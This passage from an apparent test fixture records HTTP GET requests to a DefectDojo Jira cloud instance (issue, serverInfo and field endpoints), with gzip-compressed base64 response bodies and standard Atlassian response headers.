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 + headers: + ATL-TraceId: + - ded626374160dce9 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:29 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 890b0c9f-4487-4a01-86e6-5661cdeedf4c + x-envoy-upstream-service-time: + - '180' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10618 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - a3667b2dbfd3d482 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:29 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - e41c55f2-0994-4000-a591-bc18949f009f + x-envoy-upstream-service-time: + - '173' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1JmnS3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAF5s799bR5e2ut2v05d + nIh8S1AGGbxnZMDZuOOENrTHGeOBO+PWIYa6dTTDb4TIFBD8Yt6rkEAGjObAcla1lEq2lSUvAOAG + IhzzHpfY247TlS1zoC0DyYUsWUFZ+cf206PVLoK8EmKrqdaIfFfXWvGkUdEtq8SORcFEX1f1v4Jg + UsPTuCiS3tFqNeHZ9SrZJ2IuE0H7cWjI+fwDAAD//wMAU45v3loBAAA= + headers: + ATL-TraceId: + - 7a1c37dca663fa6f + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a2263fc8-8d16-4447-933a-96e8f537f29b + x-envoy-upstream-service-time: + - '43' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 1d3cd243a5e77867 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 5cf28ac9-734c-4950-bb7f-e69f90b82399 + x-envoy-upstream-service-time: + - '70' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1JmnS3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAF5s799bR5e2ut2v05d + nIh8S1AGGbxnZMDZuOOENrTHGeOBO+PWIYa6dTTDb4TIFBD8Yt6rkEAGjObAcla1lEq2lSUvAOAG + IhzzHpfY247TlS1zoC0DyYUsWcGh+mP76dFqF0FeCbHVVGtEvqtrrXjSqOiWVWLHomCir6v6X0Ew + qeFpXBRJ72i1mvDsepXsEzGXiaD9ODTkfP4BAAD//wMAGc942VoBAAA= + headers: + ATL-TraceId: + - 46cf5a320735f9ac + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d502e79e-4bbc-460d-a5d3-e5caff6212df + x-envoy-upstream-service-time: + - '31' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + 